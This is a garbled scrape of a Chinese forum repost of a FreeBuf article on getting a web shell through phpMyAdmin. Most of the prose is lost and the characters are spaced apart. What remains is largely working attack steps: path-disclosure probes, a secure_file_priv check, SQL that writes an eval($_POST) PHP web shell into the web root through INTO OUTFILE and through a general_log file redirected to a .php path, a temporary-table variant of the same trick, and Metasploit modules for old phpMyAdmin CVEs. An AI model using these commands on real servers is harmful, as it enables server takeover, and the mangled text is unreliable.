[14997] 2020-02-10_phpMydmin的GetShell思路

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2020-02-10_phpMydmin的GetShell思路 p h p M y d m i n G e t S h e l l F e n g S e c   F r e e B u f   2 0 2 0 - 0 2 - 1 0 p h p M y a d m i n p h p M y a d m i n P H P M y S Q L 使 使 W e b   U R L S h e l l l o g l o a d _ f i l e U R L ( g p c = o f f ) w w w . a b c . c o m / i n d e x . p h p ? i d = 1 ' w w w . a b c . c o m / i n d e x . p h p ? i d = - 1 N g i n x W e b N g i n x / x . p h p p h p w w w . a b c . c o m / b g . j p g / x . p h p G o o g l e   s e l e c t   @ @ d a t a d i r ;   #   W i n d o w s   c : w i n d o w s p h p . i n i                                                           #   p h p   c : w i n d o w s s y s t e m 3 2 i n e t s r v M e t a B a s e . x m l               #   I I S     #   L i n u x   / e t c / p h p . i n i                                                                       #   p h p   / e t c / h t t p d / c o n f . d / p h p . c o n f   / e t c / h t t p d / c o n f / h t t p d . c o n f                                           #   A p a c h e   / u s r / l o c a l / a p a c h e / c o n f / h t t p d . c o n f   / u s r / l o c a l / a p a c h e 2 / c o n f / h t t p d . c o n f   / u s r / l o c a l / a p a c h e / c o n f / e x t r a / h t t p d - v h o s t s . c o n f   #     s i t e : x x x . c o m   w a r n i n g   s i t e : x x x . c o m   f a t a l   e r r o r   w w w . x x x . c o m / t e s t . p h p
p h p M y a d m i n M y S Q L P H P p h p M y a d m i n S Q L G e t S h e l l U R L s h e l l s e c u r e f i l e p r i v N U L L s h e l l G e t S h e l l S Q L s h e l l G e t S h e l l M y S Q L 5 . 0 G e t S h e l l   w w w . x x x . c o m / c e s h i . p h p   w w w . x x x . c o m / i n f o . p h p   w w w . x x x . c o m / p h p i n f o . p h p   w w w . x x x . c o m / p h p _ i n f o . p h p   w w w . x x x . c o m / 1 . p h p   p h p M y A d m i n / l i b r a r i e s / s e l e c t l a n g . l i b . p h p   p h p M y A d m i n / d a r k b l u e o r a n g e / l a y o u t . i n c . p h p   p h p m y a d m i n / t h e m e s / d a r k b l u e _ o r a n g e / l a y o u t . i n c . p h p   p h p M y A d m i n / i n d e x . p h p ? l a n g [ ] = 1   p h p M y A d m i n / d a r k b l u e o r a n g e / l a y o u t . i n c . p h p   p h p M y A d m i n / i n d e x . p h p ? l a n g [ ] = 1   / p h p m y a d m i n / l i b r a r i e s / l e c t _ l a n g . l i b . p h p     / p h p M y A d m i n / p h p i n f o . p h p   / p h p m y a d m i n / t h e m e s / d a r k b l u e _ o r a n g e / l a y o u t . i n c . p h p   / p h p m y a d m i n / l i b r a r i e s / s e l e c t _ l a n g . l i b . p h p   / p h p m y a d m i n / l i b r a r i e s / m c r y p t . l i b . p h p   s e l e c t   v e r s i o n ( ) ;     - -     s e l e c t   @ @ d a t a d i r ;     - -     s h o w   V A R I A B L E S   l i k e   ' % c h a r % ' ;     - -     s e l e c t   @ @ s e c u r e _ f i l e _ p r i v       - -   s e c u r e _ f i l e _ p r i v   - -   s e c u r e _ f i l e _ p r i v = N U L L ,   - -   s e c u r e _ f i l e _ p r i v = ' ' ,   - -   s e c u r e _ f i l e _ p r i v = / p a t h / ,     s e l e c t   l o a d _ f i l e ( ' c : / p h p i n f o . p h p ' ) ;                 - -     s e l e c t   ' 1 2 3 '   i n t o   o u t f i l e   ' c : / s h e l l . p h p ' ;     - -   - -     " G : p h p S t u d y W W W "   s e l e c t   ' < ? p h p   e v a l ( $ _ P O S T [ " p w d " ] ) ; ? > '   i n t o   o u t f i l e   ' G : / p h p S t u d y / W W W / s h e l l . p h p ' ;   s h o w   v a r i a b l e s   l i k e   ' % g e n e r a l % ' ;     V a r i a b l e _ n a m e           V a l u e   g e n e r a l _ l o g               O F F   g e n e r a l _ l o g _ f i l e     G : p h p S t u d y M y S Q L d a t a F e n g S e c . l o g
g e n e r a l _ l o g g e n e r a l l o g f i l e s h e l l G e t S h e l l s h e l l _ t a b l e 1 x i a o m a T E X T S Q L s e t   g l o b a l   g e n e r a l _ l o g   =   " O N " ;         - -     s e t   g l o b a l   g e n e r a l _ l o g _ f i l e   =   " G : / p h p s t u d y / W W W / l o g . p h p " ;     - -   , , 使 S h e l l U R L   s e l e c t   ' < ? p h p   e v a l ( $ _ P O S T [ p w d ] ) ;   ? > ' ;   < ? p h p   e v a l ( $ _ P O S T [ p w d ] ) ;   ? > '   - -     " G : p h p S t u d y W W W "   s e l e c t   *   f r o m   s h e l l _ t a b l e   i n t o   o u t f i l e   " G : / p h p s t u d y / W W W / s h e l l . p h p " ;
M y S Q L G e t S h e l l C V E - 2 0 1 3 - 3 2 3 8 3 . 5 . x   <   3 . 5 . 8 . 1   a n d   4 . 0 . 0   <   4 . 0 . 0 - r c 3   A N Y U N . O R G e x p l o i t / m u l t i / h t t p / p h p m y a d m i n p r e g r e p l a c e C V E - 2 0 1 2 - 5 1 5 9 p h p M y A d m i n   v 3 . 5 . 2 . 2 e x p l o i t / m u l t i / h t t p / p h p m y a d m i n 3 5 2 2 _ b a c k d o o r C V E - 2 0 0 9 - 1 1 5 1 P h p M y A d m i n / c o n f i g / c o n f i g . i n c . p h p 2 . 1 1 . x   <   2 . 1 1 . 9 . 5   a n d   3 . x   <   3 . 1 . 3 . 1 e x p l o i t / u n i x / w e b a p p / p h p m y a d m i n _ c o n f i g & p h p m y a d m i n 2 . 1 1 . 9 . 2   r o o t 2 . 1 1 . 3   /   2 . 1 1 . 4 ' l o c a l h o s t ' @ ' @ " p h p m y a d m i n   g e t s h e l l m y s q l p h p m y a d m i n   g e t s h e l l 姿 * F e n g S e c F r e e B u f . C O M   D r o p   T A B L E   I F   E X I S T S   s h e l l _ t a b l e ;   C r e a t e   T A B L E   s h e l l _ t a b l e   ( x i a o m a   t e x t   N O T   N U L L )   - -     I n s e r t   I N T O   s h e l l _ t a b l e   ( x i a o m a )   V A L U E S ( ' < ? p h p   e v a l ( $ _ P O S T [ 1 ] ) ; ? > ' ) ;     - -     s e l e c t   *   f r o m   s h e l l _ t a b l e   i n t o   o u t f i l e   ' G : / p h p s t u d y / W W W / s h e l l . p h p ' ;       - -     D r o p   T A B L E   I F   E X I S T S   s h e l l _ t a b l e ;         - -  

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则